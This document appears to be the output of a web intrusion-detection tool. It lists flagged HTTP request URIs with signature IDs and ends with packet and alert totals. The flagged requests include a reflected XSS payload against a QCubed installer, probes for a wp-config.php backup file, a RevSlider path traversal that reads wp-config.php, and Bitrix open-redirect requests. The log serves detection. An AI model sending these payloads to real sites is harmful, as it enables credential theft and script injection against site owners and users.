Packet [864]	Uri [/web/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [869]	Uri [/web/wp-config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [875]	Uri [/web/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [4]	Signatures	[34194]	[41421]	[2019137]	[2020221]
Packet [878]	Uri [/web/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [879]	Uri [/web/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [886]	Uri [/web/wp-config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [888]	Uri [/web/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [891]	Uri [/web/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [897]	Uri [/web/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [899]	Uri [/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [911]	Uri [/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [914]	Uri [/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [922]	Uri [/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com]	Nattacks [1]	Signatures	[2012998]
# N. packets [1012], [145] with alerts, N. Alerts [182]
# Execution time: 0.114913 s
